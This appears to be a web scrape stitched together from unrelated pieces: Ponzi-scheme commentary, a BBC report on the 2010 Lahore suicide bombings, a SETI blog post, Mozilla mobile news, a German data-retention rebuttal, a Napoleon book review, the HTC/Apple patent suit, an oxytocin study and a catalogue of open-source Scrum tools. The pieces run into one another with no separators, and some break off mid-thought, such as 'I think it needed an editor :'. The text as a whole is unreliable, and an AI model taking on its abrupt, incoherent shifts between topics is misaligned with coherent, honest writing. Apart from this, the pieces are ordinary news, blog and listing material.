As the victims of Madoff can attest , justice is bittersweet in the wake of a Ponzi scheme : the ringleader may spend his life in prison , his belongings publicly auctioned off as a form of catharsis as much as restitution , but investors are rarely made whole again .
The scars remain .
Ours is now a Ponzi nation .
There is a new mood in the land .
Just how it will play out is unknown , but a sense of having been conned is still spreading — as if not just surprising numbers of investors , but the whole country had experienced the last days of a giant Ponzi scheme .
With it goes a feeling that what we ’ve been living through , even in “ the best of times , ” was n’t an American dream , but pure nightmare .
Welcome to America , sucker .
You have already voted for this video .
We appreciate your help .
You have already reported this video .
Stuck on a roller coaster , with the devil !
Well pretty much , Janice was no support to Tonys pleads for help ..
Stuck on a roller coaster , with the devil !
Well pretty much , Janice was no support to Tonys pleads for help ..
Welcome to San Franpsycho , a San Francisco themed photography show featuring the work of Derek Poon and Travis Jensen at DWNTWN Skate Supply in San Francisco .
The opening reception is on March 6th and the show runs through May 6th .
In conjunction with the show , we will be releasing a collab shirt with Frank Chu , one of San Francisco ’s most prolific characters , who will also be in attendance at the opening .
Daniel Harlan , the homeless man who had been searching for his cat Samantha for weeks , was reunited with her this evening .
Tom Neville had rescued the cat from what he perceived as a desperate situation , tied up in the rain under the freeway .
Neville said the cat 's hair was matted , and she had fleas and sores , which he cleaned up .
He understandably had mixed feelings about returning her to the homeless life , but Harlan reportedly wept when Neville ended up returning the cat to him .
Neville also gave Harlan cat food and $ 40 .
which Harlan used to buy a new collar and leash , as well as a cart with wheels and a sleeping bag .
Harlan figured they would end up sleeping in the Transbay Terminal tonight .
The first two bombs apparently targeted military vehicles Twin suicide bomb attacks on the Pakistani city of Lahore have killed 45 people and injured around 100 .
Bombers targeted military vehicles as they passed through a crowded area and at least nine soldiers are among the dead , officials say .
Several more explosions were heard in the city later on Friday , but there were no reports of serious injuries .
The attacks follow threats by Taliban militants to send out thousands of suicide bombers .
The earlier explosions took place near the RA Bazaar , in a busy residential and shopping area where army and security agencies have facilities .
No group said they had carried out the bombings .
' Smoke rising everywhere ' Pakistani media suggest that at least some of the blasts heard later on Friday were caused by firecrackers .
One unconfirmed report spoke of several injuries .
ANALYSIS By M Ilyas Khan , BBC News , Islamabad
These latest attacks are the first in this politically important city since December .
It is the capital of Pakistan 's most populous province - a barometer of its stability .
One possible reason for this sudden escalation could be the recent death of Qari Zafar , a top leader of the so - called Punjabi Taliban , in a US drone strike in the north - west .
But it may also be simply a waxing and waning of pressure by the militants to wear down the government 's resolve .
Lahore is the only provincial capital which is still considered relatively safe .
Other cities have borne the brunt of incessant militant attacks .
Officials said the earlier blasts had occurred within 15 to 20 seconds of each other .
There are conflicting reports about whether the two bombers rode motorcycles or were on foot .
Police official Chaudhry Mohammad Shafiq said the severed heads of both attackers had been found .
Suicide bombers often strap explosives to their bodies and are decapitated when they detonate .
An eyewitness , Mohammad Nadeem , said he had been praying in a mosque when he heard the first blast and rushed out only to hear a second .
" The second blast took place very near a military vehicle , " Mr Nadeem , his clothes stained with blood , told AFP news agency .
" I sensed real danger and started running .
There were scenes of destruction in nearby restaurants and shops .
" There were broken chairs and tables and other items lying everywhere on the ground . "
Another eyewitness , Afzal Awan , said he had seen wounded people with limbs missing lying in pools of blood .
" I saw smoke rising everywhere , " he told reporters .
" A lot of people were crying . "
Taliban threat On Monday Taliban militants destroyed a building used by intelligence services in Lahore , killing 13 people .
ATTACKS ON LAHORE 12 March 2010 :
At least 45 die in two explosions 8 March 2010 : 13 killed in attack on security agency building 7 December 2009 : 48 killed in blast at a crowded market 15 October 2009 : 40 die in assaults on security forces 27 May 2009 : Car bomb attack on police buildings kills at least 23 30 March 2009 : Gunmen attack a police academy , killing eight 3 March 2009 : Six die in ambush on visiting Sri Lankan cricket team
In pictures : Lahore attacks After that attack , the Pakistani Taliban promised to unleash up to 3,000 suicide bombers across the country unless Pakistan 's army stopped its operations against the militant group and US drone strikes ended .
Pakistan has been fighting insurgents in the volatile tribal areas bordering Afghanistan .
The military recently stepped up operations against the Taliban leadership , arresting the military commander of the Afghan Taliban , Mullah Abdul Ghani Baradar , who was hiding in the southern city of Karachi .
A number of other top figures in the Afghan Taliban are also reported to have been arrested across Pakistan over the last few weeks .
In the last six months , hundreds of civilians have been killed in militant attacks across the country .
The BBC's Aleem Maqbool in Islamabad says there are no signs the violence is coming to an end .
Last October simultaneous assaults on three security buildings across Lahore killed 38 people .
In December , two bomb blasts at a market in the city killed 48 and injured more than 100 .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Searching for aliens
Here 's what I do n't understand about the alien civilizations that send spacecraft to Earth and abduct people in their sleep to subject them to mysterious experiments back on board the Mothership :
Why do n't they just read about it on the Internet ?
We 're posting genomic data about human beings and other organisms right there on the Web .
Is n't the abduction thing a lot of fuss and bother ?
I know what you 're going to say :
The aliens are n't just interested in our DNA , they also want to map our aura , our chakra and the source of our chi energy .
That 's right :
They 're technological , but they 're also really into yoga .
From a purely scientific standpoint , the great mystery of aliens is why we have n't found any yet .
You know : the Fermi Paradox .
" Where are they ? "
Fermi suddenly blurted out in a conversation in 1950 .
The Search for Extra-Terrestrial Intelligence ( SETI ) is 50 years old this month .
It was April 8 , 1960 , that Frank Drake used a telescope at Green Bank , W. Va. , for the first search for radio signals from other worlds .
It 's the subject of a new book , " The Eerie Silence , " by Paul Davies , who is one of my favorites -- imaginative , smart , lucid .
He 's sort of a throwback natural philosopher who takes on cutting - edge ideas about time , space , life , God , the whole ball of wax .
Davies thinks we should throw out any and all assumptions about what alien intelligence might be like .
Classic SETI supposes that ET will intentionally send radio signals ;
Davies thinks we should be more focused on detecting anything anomalistic in our astronomical observations .
He also suspects that ET will quickly evolve out of a flesh - and - blood state and become a form of artificial intelligence .
A similar argument has been advanced by Seth Shostak , who last year sent me the abstract of a talk in which he outlines the reasons for expanding traditional SETI strategy to encompass the possibility that civilizations of artificial intelligence may be inhabiting what we 'd call empty places in the galaxy -- that is , places other than rocky , Earth - like planets .
Shostak 's reasoning is that , once artificial intelligence reaches a certain threshold , it becomes a bit of a runaway train ( pardon the weak metaphor ; it 's actually a runaway brain of sorts ) .
Machine intelligence is immortal .
Interstellar travel is possible , and the time it takes to get somewhere is unimportant when you live forever .
Shostak goes on :
" ... the restriction to watery worlds is not one that such intelligence is required to heed .
Indeed , it 's unclear that they need be situated on planets at all .
The interstellar flux in our part of the Galaxy is roughly a watt per square kilometer of collector .
Consequently , it 's not inconceivable that efficient machines could be situated anywhere , not just in the immediate neighborhoods of stars .
" While low - power machinery might eke out an existence between the stars , the intellectual giants of the universe - machines able to expand their computational activities far beyond what we can conceive - might be prodigious consumers of energy .
That suggests that these alpha male sentients might repair to regions of high energy density , for instance the center of the Galaxy .
For the machines , for whom the trip to the center is only an inconsequential inconvenience , and for whom the bad environment would be tolerable , this might be a desirable place to set up shop . "
Shostak thinks we should search for intelligence in and around Bok globules .
I 'm a little fuzzy on what a Bok globule is , but I 'll take Shostak 's word for it that such things might be loaded to the gills with aliens .
Shostak 's idea is similar to something Freeman Dyson has been saying for a long time :
That life will adapt to space and find habitats in places we would find inhospitable , such as the Oort Cloud .
I do wonder if this migration to artificiality , from flesh - and - blood to machine , is an inevitability for any intelligent species .
Sure , it 's happen to me personally , but this is n't about me .
Maybe the artificial aliens will realize that they want to evolve still further -- back to being meat creatures .
This subject is one to be approached , of course , with intellectual modesty .
Let us recall something Stephen Jay Gould said to me back when I was researching my book " Captured By Aliens " :
" No data . "
We know of exactly one example of life in the universe .
Until we have more data , everything 's possible -- and we truly do n't know what we 're talking about .
--
For space policy buffs :
Here 's a statement from Norm Augustine about Obama 's space strategy .
I think it needed an editor :
Instead Mozilla will concentrate on developing its mobile browser for Android and Maemo
Mozilla has decided to stop development of a version of its Firefox mobile Web browser for phones running Windows Mobile .
The reason is that Microsoft has closed the door to native applications on smartphones running its new Windows Phone 7 Series software , Stuart Parmenter , director of Mobile Engineering at Mozilla Corporation , wrote in a blog post on Monday .
Mozilla was gearing up to develop a version of Firefox for Windows Mobile , and the development work Mozilla has done on Windows CE 6 has left it " well positioned to have an awesome browser on Windows Phone 7 , " according to Parmenter .
But the absence of a software development kit for native applications has made it impossible for Mozilla to move forward , he said .
Microsoft will only support development of applications running in the Silverlight runtime environment , or of games in the XNA Game Studio runtime environment , it announced last week at its Mix conference .
It will not allow third party app developers direct access to the phone 's hardware , where they might be better able to exploit its potential .
Still , Parmenter hopes that Microsoft provide Mozilla with a way to build Firefox for Windows Phone 7 Series .
Mozilla thinks Windows Phone 7 looks interesting and has the potential to do well in the market , according to Parmenter .
For now , Mozilla will concentrate an upcoming version of Firefox for Android - based phones , and on the existing version of the browser for Maemo , the operating system used in Nokia 's flagship N900 phone , Parmenter wrote .
Mozilla released that browser on Jan. 29 .
Firefox for Android is still only a pre-alpha version , which means it is still in the early stages of development , according to Mozilla .
The pre-alpha version has been optimized for Motorola 's Droid and Google 's Nexus One .
Mozilla still has " a way to go before any kind of usable alpha release , but we 're certainly one step closer " , Mozilla 's Vladimir Vukićević wrote in a blog post on Feb .
2 .
Some people are n't very picky when it comes to beer , as a quick sip of any swillish product commonly advertised during sports broadcasts can confirm .
However , the Something Awful Forum Goons came up with some concoctions that even those morons in the commercials who crave terrible beer above all else would n't tolerate .
winter .mute would definitely pour this brew into his enemy 's goblet rather than his own .
Saint Rude came up with this concept , then handed it off to an army of babies .
Such a product does not exist , Saint Sputnik .
You must have dreamed it .
Any beer that embraces carob is not for Moneypenny Dreadful .
Nach dem Urteil des Bundesverfassungsgerichts zur Vorratsdatenspeicherung ist die mediale Rhetorik der Vorratsdatenspeicherungs - Befürworter so radikalisiert worden , dass Deutschland ( fast ) als kriminales Wunderland artikuliert wird .
Ich fand bisher keine Zeit , mich mit den Argumenten ausführlich auseinander zu setzen und bin froh , dass Malte Spitz das schon in seinem Blog gemacht hat .
Mit freundlicher Genehmigung spiegel ich das einfach mal hier :
Fakten zur aktuellen Diskussion um die Vorratsdatenspeicherung
Gerne wurde in den vergangenen Tagen nach der Entscheidung des Bundesverfassungsgerichts zur Vorratsdatenspeicherung von Sicherheitsfanatikern der Untergang des Abendlandes an die Wand gemalt .
Hier ein paar Antworten auf einige „ Thesen “ in dieser Diskussion :
„ Wenn sich das herumspricht , dann wird Internetkriminalität nach Deutschland verlagert “ , sagte de Maizière der „ Frankfurter Allgemeinen Sonntagszeitung “ Quelle : heise.de
Falsch .
Die Richtlinie zur Vorratsdatenspeicherung ist noch lange nicht in allen EU Mitgliedstaaten umgesetzt .
So gibt es in Schweden oder auch Österreich gerade Diskussionen über eine Umsetzung bzw .
ob es überhaupt umgesetzt werden soll .
Obwohl in diesen Ländern also gerade keine Vorratsdatenspeicherung gilt , hat sich die Internetkriminalität nicht in diese Länder verlagert .
Siehe dazu die aktuellen Zahlen des Bundeskriminalamts ( PDF ) von Österreich , wo von KEINER besonderen Problematik mit Internetkriminalität gesprochen wird .
„ Uns wird mit der Nutzung dieser Daten ein zentrales Instrument zur Bekämpfung und Aufklärung von Verbrechen aus der Hand genommen .
Es gibt Täter , denen wir ohne die Nutzung von Telekommunikationsdaten nicht auf die Spur kommen .
Da geht es auch um Beleidigung , Betrug und Stalking übers Internet . “
Klaus Jansen , Vorsitzender des Bundes Deutscher Kriminalbeamter , Quelle : Passauer Neue Presse
Falsch .
Die Verfolgung von Straftaten hat auch vor dem 1 . Januar 2008 in Deutschland stattgefunden , bis dahin gab es in Deutschland keine Vorratsdatenspeicherung .
Trotzdem wurden Delikte wie Betrug oder auch Beleidigung geahndet .
Zudem sind gerade Tatbestände wie Beleidigung schon seit dem Eilentscheid des Bundesverfassungsgerichts vom März 2008 zu den Fällen zu zählen , wo keine Daten aus der Vorratsdatenspeicherung genutzt werden durften .
„ Auch der Bund Deutscher Kriminalbeamter ( BDK ) schlug in unserer Zeitung Alarm :
In zwei von drei Fällen sei die Polizei bei ihren Ermittlungen inzwischen auf Vorratsdaten angewiesen .
„ Tendenz deutlich steigend “ , sagte BDK - Chef Klaus Jansen . “
Quelle : Neue Osnabrücker Zeitung
Falsch .
Die Anzahl von Verfahren in denen Daten aus der Vorratsdatenspeicherung abgefragt wurden lag im Jahr 2008 bei gerade einmal 8316 .
Insgesamt gab es aber laut offizieller Kriminalitätsstatistik rund 6,39 Millionen polizeilich registrierte Straftaten , dies bedeutet nicht zwei von drei Fällen sondern einer von 760 Fällen !
Hier noch einmal die aktuelle Übersicht des Bundesamts für Justiz zur Abfrage nach § 100g Abs. 1 StPO als PDF für 2008 .
Zahlen für 2009 werden erst im Sommer 2010 veröffentlicht .
„ Viele Straftaten könnten nur mit den Daten aus der Vorratsdatenspeicherung aufgeklärt werden , sagte der CDU - Politiker der „ Bild - Zeitung “ ( Dienstagsausgabe ) .
„ Sollte das Gericht das Gesetz verwerfen , werden viele Täter nicht mehr überführt werden können .
Die Terrorhelfer sind hochkommunikativ und konspirativ , wir brauchen den Datenzugriff . “ sagt Wolfgang Bosbach ( CDU - Innenexperte ) Quelle : Reuters
Falsch .
Bereits im Jahr 2007 hat das Max - Planck - Institut für Strafrecht herausgefunden das die Möglichkeit der Nutzung von Informationen aus der Vorratsdatenspeicherung nur minimale Verbesserungen der Aufklärungsquote in der Verbrechensbekämpfung bringen würden .
Andere Instrumente wie die TKÜ oder Abfrage von Bestandsdaten im Telekommunikationsbereich dürfen zudem weiterhin genutzt werden .
Alternative Ansätze wie Quick Freeze sind außerdem ähnlich wirksam , bedeuten aber keine permanente Massenüberwachung der Gesamtbevölkerung .
Die aktuelle Verurteilung der Mitglieder der so genannten Sauerland - Gruppe zeigt zudem , die Terrorismis - Bekämpfung ist auch ohne Vorratsdatenspeicherung möglich .
Die Verhaftung der Sauerland - Gruppe fand im September 2007 statt , die Vorratsdatenspeicherung wurde aber erst zum 1 . Januar 2008 eingeführt .
Smart Email Solutions For Your Small Business or Team
Email has long been considered an essential element of any successful business .
However , choosing the right email solution for your business can be daunting .
HostPapa can help !
We have a variety of affordable email solutions for small business owners just like you .
Find the right email
While Mr. Lieven ’s depiction of the battles and maneuvers are as sure and as exciting as Hardy could wish for , his explanation of the realities of warfare in the pre-industrial world is equally interesting .
It ’s an old saying in the military that “ amateurs talk about strategy , professionals talk about logistics . ”
And the logistics of supplying an army as huge as Napoleon ’s in Russia as it advanced a thousand miles from its bases were formidable to put it mildly .
An army of 120,000 men and 40,000 horses , according to Mr. Lieven , needed 850 carts just to carry a single day ’s food and forage .
Powder and shot for the artillery , medical care for the sick and wounded , tents and other supplies required many more .
Napoleon ’s vast army could not possibly have transported the food and fodder it needed and had to live off the resources of the lands he was invading .
The Russians did their very considerable best to deny the French those resources .
And here was one of the Russians ’ secret weapons , the Cossacks .
Bred to irregular warfare , the Cossacks , along with Russia ’s far superior light cavalry units , were the Russian forces most feared by the French ( and admired by Napoleon , who wished they were on his side ) .
Able to move quickly , informed by the local peasants of French units , they were able to harass the enemy ’s foraging parties mercilessly .
When Napoleon reached Moscow , matters got even worse for him and his vital cavalry .
A stationary army in this time quickly exhausted the local food supply for the horses , and foraging expeditions had to reach further and further , ever more exposed to partisan forces .
Napoleon ’s cavalry had been badly mauled at Borodino , but it was the six weeks in Moscow that largely destroyed it as a fighting force as well as decimated the artillery horses .
This had grave strategic consequences for the French , not just tactical ones .
Napoleon had lost not only most of the men he had led to Russia but 175,000 horses as well .
The men could be replaced , as indeed they largely were before the next year ’s fighting , but the horses could not .
In 1813 , despite scouring the French Empire , only 29,000 could be procured , and most of them were not of top quality .
This would cripple the French in the campaign of 1813 and be a considerable factor in Napoleon ’s reverses of the summer and autumn of that year .
This is a story of great sweep and drama , played out over the map of Europe by larger - than - life characters whose names are still familiar to us today .
And Dominic Lieven , a master of the material and a fine writer , tells it rattling well .
The National Broadband Plan , released by the FCC on March 17 , 2010 , sets out a roadmap for initiatives to stimulate economic growth , spur job creation and boost America 's capabilities in education , health care , homeland security and more .
The plan includes sections focusing on economic opportunity , education , health care , energy and the environment , government performance , civic engagement and public safety .
Download the Plan
Working Reports and Technical Papers
The FCC Omnibus Broadband Initiative ( OBI ) Working Reports Series and Technical Paper Series present analysis and research by FCC staff members .
These papers reflect work performed in support of the National Broadband Plan and provide context for the Plan .
Related Materials
Taiwanese smartphone maker HTC defended itself against a suit brought on by Apple yesterday , saying it does n't infringe , but develops its own technologies .
HTC is not only a mobile technology innovator , [ we ] also hold a large number of patents , the company said in a filing to the Taiwan Stock Exchange on Wednesday .
The Taiwanese company , the world 's largest maker of smartphones that use Google 's Android mobile operating system , including the Nexus One , said it will work with the U.S. justice system to protect its own innovations and rights .
Apple filed a lawsuit against rival handset maker HTC on Tuesday , over the alleged infringement of 20 patents related to the iPhone 's user interface .
The patents at the center of Apple 's lawsuits involve user interface technologies including icons , multi- touch and gestures , as well as technologies related to touch screens , power management , semiconductors , and the underlying hardware , software , and services architecture .
We can sit by and watch competitors steal our patented inventions , or we can do something about it .
We 've decided to do something about it , said Apple co-founder Steve Jobs in a statement .
HTC believes the Apple lawsuit poses a threat to its business in the short - term , HTC said .
But some analysts believe this may prove to be a blow to companies like HTC vying to compete against Apple .
While this lawsuit could take years , we believe [ Apple ] may have a case here as the inventor of many key technologies including multi-touch and gestures , Kaufman analysts Shaw Wu said .
We think a likely outcome is an out - of - court settlement where some of the infringing features are taken out by HTC and / or licensing fees are paid to AAPL .
In our view , competitors will likely need to work on alternatives .
The case is filed with the U.S. District Court in Delaware and the U.S. International Trade Commission ( ITC ) .
A new study found that inhaling oxytocin once a week for two weeks helped adolescents understand facial expressions .
Adam Guastella , of the Brain & Mind Research Institute at the University of Sydney , led the experiment .
Eric Hollander and Jennifer Bartz did the first studies of oxytocin as a treatment for symptoms of autism spectrum disorder .
They gave it intravenously to adults , and found improvements in the ability to recognize the emotional content of speech improved for up to two weeks after treatment .
A French study of adults found the same improvement when adults with autism inhaled oxytocin .
This is the first study of adolescents .
It 's possible that oxytocin could help them improve their ability to read social cues , and that the effect could last their lifetimes .
Guastella has been studying the effects of oxytocin on humans without diagnosed disorders .
He 's found that men who inhale oxytocin tend to remember photos of smiling faces more than those who have n't had a dose .
He 's also tested whether oxytocin could make couples more open during psychotherapy .
He has grants to test oxytocin as a therapy for schizophrenia and Prader - Willi Syndrome , as well .
New Reply
Replies are closed on this thread .
This website presents a list of free and open source Scrum tools and solutions for Agile project management : sprints and releases planning , velocity , product backlog , user stories management , sprint tracking with burndown or burnup charts , planning poker , retrospectives , product owners , scummaster .
Scrum is an iterative and incremental project management framework for Agile software development and product discovery .
Scrum tools allow the product owner to manage the requirements with a product backlog of epics , features and user stories .
The ScrumMaster uses Scrum tools to track the Scrum sprints with Scrum burndown charts and velocity .
He might also plan the work with planning poker .
After each Scrum sprint , the team reflect about its work with retrospectives .
Modern tools allows to adopt Agile scaling approaches like SAFe , Lesss , Disciplined Agile Delivery ( DaD ) or Nexus .
You will also find on this web site free and open source Kanban tools that can be used for a Lean approach to software development projects .
Kanban is a Lean project management approach that encourages a pull approach to project management and the limitation of the work in progress ( WIP ) to avoid waste .
Free and open source Kanban tools allow visual project management with information radiators where you can visually manage the workflow of tasks represented on the lanes of a visual board .
Agilefant
Agilefant is a simple but powerful solution for managing software development projects and related activities .
It brings together the perspectives of organizing daily work , long - term product and release planning and project portfolio management .
This tool has also a commercial online hosted version .
Agilefant Open Source Scrum Tool
Agilo for Trac
Agilo for trac is an Agile and Scrum Tool that delivers a robust platform and streamlined functionality for agile teams using trac and agile methodologies .
There is an open source , a commercial and a hosted version of the tool .
Each download of Agilo for trac comes with a free 30 - day evaluation of all the enhanced features of Agilo for trac Pro .
After the 30 days these enhanced features are deactivated automatically .
From that moment on you can purchase Agilo Pro Licenses or continue to use the free version .
Agile Project Management Tool ( APMT )
Agile Project Management Tool ( APMT ) is an open source tools that automates Scrum which is an Agile methodology .
APMT is a Highly Customizable and Comprehensive Tool .
It covers all aspects of Scrum methodology like Maintaining the Project Backlog , Creating Sprints , Creating Sprint Backlog , Conducting Daily ScrumMeeting and Burndown Chart .
Agileista
Agileista is an online collaboration tool for distributed Scrum teams that is available both as an open source solution and a commercial hosted service .
AgileMantis
agileMantis tries to bridge the gap between the open source bug tracking system MantisBT and Agile software development with Scrum .
You can manage requirements for software products with MantisBT when these requirements are represented by issues that can be picked up and processed for defined target versions of the software .
Apa
Apa is a free online tool for Scrum and Agile projects that provides easy - to - use Scrum and Kanban boards .
You can change any board to fit your needs by simply dragging and dropping stuff around .
It is very easy to create columns , change their widths or rearrange them .
The tool provides many charts : Burndown Chart , Cumulative Flow Diagram , Lead Time / Cycle
Time diagrams .
Once you have created a project , you can simply invite people to join it by email .
Bz Kanban Board
Bz Kanban Board is an open source tool that allows you to visualize your Bugzilla product milestones with a Kanban inspired board .
The goal is to compliment an existing Bugzilla workflow , so the board columns represent the bug statuses and the cards represent the bugs .
Cards can be opened to view comments or add a new comment .
Cards can be dragged from one column to another to change the bug status .
Bz Kanban Board is implemented as a single - page application using Ajax with the Bugzilla 5 server REST API .
ClearWorks
ClearWorks is a flexible and powerful Agile project management software that works with Scrum , Extreme Programming , etc .
It is also a BPM ( Business Process Management ) software that provides governance of enterprise business 's process environment to improve agility and operational performance .
Express - Agile Project Management
Express is an open source , Agile project management tool .
It provides tools for managing and tracking stories and tasks , projects and iterations .
It has a virtual Kanban wall for tracking progress of tasks and stories and provides reporting through iteration burndown charts and an iteration velocity comparison chart .
Impediments can be logged and tracked .
Express - Agile Project Management
ezScrum
ezScrum is an open source process management tool for the Scrum Agile project management approach .
Firepoker
Firepoker is an open source planning poker powered by Firebase and AngularJS .
It is also available online on a dedicated website .
FireScrum
The FireScrum is a Open Source Software ( OSS ) which supports the agile project management using Scrum .
It is under the GPL license and uses Rich Internet Application ( RIA ) features .
GitScrum
GitScrum is a simple open source solution to manage Agile software development projects .
GitScrum can be integrated with Github or Gitlab or Bitbucket .
It features a Product Backlog that contains the Product Owner 's assessment of business value The User Story features : Acceptance criteria , prioritization using MoSCoW , definition of done checklist , pie chart , assign labels , team members , activities , comments and issues .
The Sprint Backlog features : Sprint planning using Kanban board , burndown chart , definition of done checklist , effort , attachments , activities , comments and issues .
An Issue can be added in user story to one sprint backlog , or directly in sprint backlog .
Generally , each issue should be small enough to be easily completed within a single day .
GitScrum is available in English , Chinese , Russian , German , Arabic , Spanish , Portuguese , Italian , French , Indonesian , Serbian , Hungarian and Vietnamese .
IceScrum
IceScrum is a tool for development teams using Scrum or another agile developpement process .
Both Kanban and Scrum approaches are proposed in IceScrum .
Going far beyond Scrum , IceScrum eases the team transition towards agility .
It helps implementing the key agile practices : vision , features , user stories , estimating effort with planning poker , task board , etc .
This tool has also a commercial online hosted version .
IceScrum Open Source Scrum Tool
Jitamin
Jitamin is a free open source software written in PHP , intended to handle the project management over the web .
Jitamin is a chinese fork based on the Kanboard open source kanban tool .
KADOS
KADOS ( KAnban Dashboard for Online Scrum ) is an open source web - based tool for managing Scrum and Agile projects .
It allows teams to manage their projects through multiple dashboards on which they can pin e-postit for User Stories , Tasks , Risks , Problems , Notes , Actions etc .
The main feature of KADOS is to provide many screens where the user can move his post - it to change one of the attributes of the post - it , whereas in other tools , you have to edit the post - it through a form .
Kados supports most aspects and artifacts of SCRUM method , but it can also be adapted for other Agile methods .
Kados is available in French , English , Spanish and soon German version
Kados Open Source Scrum and Kanban Tool
Kanbanara
Kanbanara is an open source web - based Project Management System that uses the Kanban methodology .
It features projects , user - definable workflow with custom states , support for epic , feature , story , enhancement , defect , task , test , bug and transient cards , global and personal WIP limits , role - based columns ( Owner , Reviewer or Quality Assurance ) , support for ghost cards , blockable cards , hidable cards , deferable cards , etc .
Kanbanzilla
Kanbanzilla is an open source kanban board integrated with the Bugzilla bug tracking software
Kanboard
Kanboard is a simple visual task board software .
Follow the Kanban methodology .
Get a visual and clear overview of your projects .
Customize your boards according to your business activities .
Multiple boards with the ability to drag and drop tasks .
Minimalist software , focus only on essential features ( Less is more ) .
Access from anywhere with a modern browser
Koalab
Koalab is an open source Scrum board powered by nginx , nodejs , mongodb , backbone and html5
Kunagi
Kunagi offers integrated project management , supplementing Scrum by a selection of other best practices to cover all project management needs .
It does not only offer management of basic Scrum documents , but also a variety of additional data .
The dashboard shows all important information relevant to the current sprint .
This includes the Sprint Burndown , current Risks and Impediments , Tasks and Issues that are in progress or still to be done , and new entries in the event journal .
The Product Backlog is a prioritized list of desired product features in form of User Stories .
While the Product Owner keeps the backlog up to date , the Team estimates the effort necessary to implement those Stories ( using Planning Poker ) .
Based on this estimation and the teams performance in prior Sprints , it is possible to project the scopeof future Sprints
Kunagi Open Source Scrum Tool
Leantime
Leantime is an open source project management system for small teams and startups written in PHP , Javascript with MySQL .
Leantime features idea boards ; research boards using the Lean Canvas ; task management using Kanban boards , list and calendar views ; milestone management using Gantt charts ; timesheet management ; retrospectives ; project dashboards .
You will able to define multiple user roles ( client , developer , manager , admin ) and integrate with Mattermost and Slack .
Leantime Open Source Scrum Tool
MeuScrum
MeuScrum is a free Kanban and Scrum online tool designed to solve the deficiency of an agile project management tool that is at the same time , easy to use , fast , and complete with useful features and a friendly interface .
It allows to manage all your projects , scrum team , backlogs , user stories , sprints , tasks , and the Kanban board easily and quickly with a drag - and - drop approach .
MeuScrum is available in English , Spanish and Portuguese .
Multikanban
Multikanban is a simple open source kanban board for multiple personal projects .
myAgilePomodoro
myAgilePomodoro is an open source time management software that brings you the best of two worlds : Agile 's most common practices and the Pomodoro Technique .
OpenProject
OpenProject is an open source project management software that supports the project management process along the entire project life cycle : From project initiation to closure .
OpenProject provides also an easy way to plan and communicate your product roadmap and break it down into a detailed release plan .
Kanban , Agile and Scrum teams can iterate fast and release constantly .
OpenProject provides the perfect tool to support agile product development methodologies such as Scrum and Kanban .
OrangeScrum
OrangeScrum is an open source Agile project portfolio management tool that has also a commercial online hosted option with a free plan for small team .
Plandora
Plandora is a multi- project management , web - based Project Management suite with Agile features .
Plandora includes time track , request management , customized reports ( based to iReport ) , customized KPIs , dashboard gadgets , knowledge base , risk management , costs and budget management , agile board , resource capacity , surveys , SVN integration , and Gantt chart .
The tool also includes : extendable agents ( email notification , audit agents , etc ) , meta fields and custom forms .
Planigle
Planigle is an easy to use , open source tool for managing your backlog , your iterations and your releases .
It comes in a free community edition as well as a commercial premium edition .
Both are hosted at www.planigle.com.
PPTS
PPTS is a WEB - based environment supporting teams who have chosen to develop software according to the agile methodologies Scrum and / or eXtreme Programming .
PrjPlanner
This tool is designed to be useful for Agile project management for the developer or first - level manager .
It takes a Scrum management approach : Manage by backlog , inform by information radiator and track issues through ToDos .
Scrinch
Scrinch is a stand - alone Swing application that helps managing your projects the Agile way ( mostly Scrum ) .
Easy to configure : not based on Web technology , no database to manage : just launch it and start working on your desktop .
scrum - board
scrum - board is an an open source JavaScript Scrum App to manage tasks with ease .
Scrum - Zamurai
Scrum - Zamurai is an agile Scrum management web application which sticks to the ways of " Agile Samurai "
Scrumblr
Scrumblr is a web - based simulation of a physical agile sprint board that supports real - time collaboration .
It is built using node.js , websockets ( using socket.io ) , CSS3 , and jquery .
Scrumforce
Scrumforce is a Force.com app on the AppExchange that provides the ability to manage SCRUM agile projects .
Scrumforme
Scrumforme is an open source project management tool meant to be easy , organized and accessible .
Inspired by Agile methodology using Scrum and Kanban simplifying teamwork .
Scrum-IT
Scrum - it is digital Scrum Board based on multi- touch and modern web technologies .
It supports your Scrum Team with a board which can manage projects , team members , sprints , userstories , tasks and the burn down chart .
It is written in HTML5 / CSS3 , jQuery and jQuery Mobile and the backend system with Java EE , Tomcat , MySQL , Hibernate , Envers
Scrum -IT Creator Open Source Scrum Tool
Scrumpy
Scrumpy is a free real - time , web - based Scrum tool , designed to skyrocket your Scrum team 's productivity .
Scrumpy servers as an all - in - one solution , as well as an auxiliary tool which supports even teams who only want to visualise their work via a task board .
Scrumvee
Scrumvee is a free online tool for Scrum Poker planning , featuring a mobile Android app and a browser platform to manage all the Scrum plannings a software development team .
Each developer selects the Scrum estimation from its own smartphone , without interfering and potentially affecting other team members .
The ScrumMaster can easily see all the estimations .
All rounds , estimations and meetings are saved for posterity .
Youc anc see how many of members of the Scrum team estimated correctly and how often and you can easily spot poorly defined stories or team members which are constantly over or under estimating .
The tool is integrated with JIRA .
Scrumwala
Scrumwala is an open source Scrum / Agile project management web app for personal use built with Laravel .
Scrumwala Open Source Scrum Tool
Simple - Kanban
Simple - Kanban is a Kanban board application and can be used in lean software development .
Taiga
Taiga is a free Agile open source project management tool that has also a hosted commercial version .
Taiga support both Scrum and Kanban approaches .
The product backlog is what will ultimately be delivered , ordered into the sequence in which it should be delivered .
Product Backlogs are broken into manageable , executable chunks named sprints .
Every certain amount of time the team initiates a new sprint and commits to deliver a certain number of user stories from the backlog , in accordance with their skills , abilities and resources .
The project advances as the backlog becomes depleted .
Task Card Creator
Task Card Creator is a small tool for printing task cards used for a Scrum board .
Your Scrum board will be looking impressive .
It supports Team Foundation Server 2010/2012/2013/2015/2017 / Azure DevOps .
Task Card Creator Open Source Scrum Tool
TaskJuggler
TaskJuggler is a modern and powerful , Open Source project management tool .
Its new approach to project planing and tracking is more flexible and superior to the commonly used Gantt chart editing tools .
It has already been successfully used in many projects and scales easily to projects with hundreds of resources and thousands of tasks .
TaskJuggler provides an optimizing scheduler that computes your project time lines and resource assignments based on the project outline and the constraints that you have provided .
The built - in resource balancer and consistency checker offload you from having to worry about irrelevant details and ring the alarm if the project gets out of hand .
The flexible as - many - details - as - necessary approach allows you to plan your project as you go , making it also ideal for new management strategies such as Extreme Programming and Scrum Agile Project Management .
Wekan
Wekan is an open - source Trello - like kanban tool built with Meteor .
Wekan allows to create Boards , on which Cards can be moved around between a number of Columns .
Boards can have many members , allowing for easy collaboration , just add everyone that should be able to work with you on the board to it , and you are good to go !
